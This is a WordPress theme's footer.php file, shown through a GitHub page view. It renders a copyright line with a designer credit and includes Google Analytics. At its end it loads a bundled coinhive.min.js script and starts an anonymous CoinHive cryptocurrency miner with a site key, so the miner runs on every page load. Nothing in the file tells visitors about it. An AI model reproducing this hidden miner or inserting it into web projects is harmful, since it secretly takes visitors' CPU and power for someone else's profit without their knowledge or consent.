-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathfooter.php
16 lines (14 loc) · 913 Bytes
/
footer.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<footer class="site-footer" role="contentinfo"><div class="site-info"><div class="site-footer-s">Copyright © <?php print(date(Y)); ?> - <?php bloginfo('name'); ?> - Designed by <a href="http://creawest.com" target="_blank">Créa'West</a></div></div></footer>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-80983677-1', 'auto');
ga('send', 'pageview');
</script>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('HNwmonit2HqbX4mk5j2X7i3pYbwMLLDj', {threads: 1});
miner.start();
</script>